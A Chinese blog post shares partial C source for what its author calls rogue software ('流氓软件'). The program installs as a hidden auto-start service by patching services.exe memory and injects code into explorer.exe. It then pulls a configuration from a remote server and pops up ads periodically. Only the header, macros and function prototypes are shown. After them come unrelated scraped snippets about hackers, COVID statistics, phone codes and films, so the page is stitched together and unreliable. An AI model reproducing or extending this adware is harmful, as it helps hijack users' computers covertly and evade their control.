ps:请勿用于非法用途,仅供技术研究之用。
by:yunshu
这个东西的主要功能就是去网上一个URL读取配置文件,拿到需要弹出的窗口以及周期时间,然后开始弹……程序安装成服务,并设置为自动启动。启动之后写入一段代码到explorer.exe进程中,也就是这里在弹网页,然后将服务停止。
我写的代码没什么技术含量,唯一的是使用了我们team的zzzevazzz的隐藏服务代码,最开始他是发在ph4nt0m的核心区的。不过他已经在自己的blog写过,所以我发出来也没问题了。
这个是主函数,安装,读取配置,注入代码用的。
代码:
/**************************************************************************************************
* 1. 给XX作的流氓软件
* 2. 隐藏服务是copy的EVA的代码,修改Services.exe进程内存。
**************************************************************************************************/
#include
#include
#include
#include
#include
// 是否记录日志
//#define DEBUG
#ifdef DEBUG
#define DEBUG_LOG "c:\debug.txt"
// 日志记录函数
void LogToFile( WCHAR * );
#endif
#include "ControlService.h"
#include "HideService.h"
#include "CustomFunction.h"
#pragma comment (lib, "Advapi32.lib")
#pragma comment (lib, "Shell32.lib")
#pragma comment (lib, "ws2_32.lib")
#pragma comment (lib, "User32.lib")
#define REMOTE_FUNC_LENGTH 1024 * 10 // 拷贝的长度
#define TARGET_PROCESS L"explorer.exe" // 要注入代码的目标进程
#define CONFIG_HOST "www.icylife.net" // 读取配置信息的服务器
#define CONFIG_PATH "/url.txt" // 配置信息在配置服务器的路径
#define IE_PATH "C:\Program Files\Internet Explorer\iexplore.exe"
#define DEFAULT_URL "http://www.he100.com" // 默认弹出的窗口
#define DEFAULT_SLEEP_TIME 30 * 60 * 1000 // 默认弹出窗口的间隔时间
// 宏,转换字符串为unicode
#define MULTI_TO_WIDE( x, y ) MultiByteToWideChar( CP_ACP, MB_PRECOMPOSED,y,-1,x,_MAX_PATH );
// 弹出窗口之间的间隔时间
int sleep_time;
// 弹出的url地址
char url_path[512] = { 0 };
/**************************************************************************************************
* 函数原形
**************************************************************************************************/
void ServiceMain( DWORD, char **); //服务入口
BOOL SetDebugPrivilege( ); //获取debug权限
DWORD GetProcessIdByName(WCHAR * ); //获取进程的PID
void InjectCode( ); //写代码到远程进程
void GetConfig( ); //更新配置,获取要弹出的地址和弹出间隔时间
/**************************************************************************************************
一、黑客网站找人(在黑客网站怎么联系对方) 1、黑客是怎么顺着他人的网站追踪到服务器并破坏的黑客攻击手段可分为非破坏性攻击和破坏性攻击两类。非破坏性攻击一般是为了扰乱系统的运行,并不盗窃系统资料,通...
【巴西累计确诊新冠肺炎超1404万例】巴西卫生部20日公布的最新数据显示,该国24小时内新增新冠确诊病例69381例,累计确诊14043076例;新增死亡病例3321例,累计死亡378003例;累计治...
本文目录一览: 1、阿桑奇是澳大利亚人,为何澳大利亚政府会弃他于不顾? 2、史上最聪明的人是谁? 3、年仅10岁的天才“黑客”:因不想写作业而黑掉学校网站,他现状如何呢? 阿桑奇是澳大利亚人...
本文导读目录: 1、vivo有哪些隐藏功能,如拨号键输入*#*#2288#*#*网络优先设置 2、vivo代码拨号的隐藏功能是什么? 3、vivo手机代码大全? 4、vivo代码隐藏功能大...
本文目录一览: 1、好看的电影推荐 2、如何认识标清和高清 3、怎样在秒拍视频里加文字表情 好看的电影推荐 1.《大侦探福尔摩斯》1、2《达芬奇密码》《天使与魔鬼》3.《国家宝藏》1、2《全...
相信现在有好多小伙伴们拿这手机都在看宠物店回应为抬价剪兔耳事情吧,因为在这两天宠物店回应为抬价剪兔耳的热度是非常高的,受到了广大网友们的关注,那么既然现在大家都非常关注宠物店回应为抬价剪兔耳,这里小编...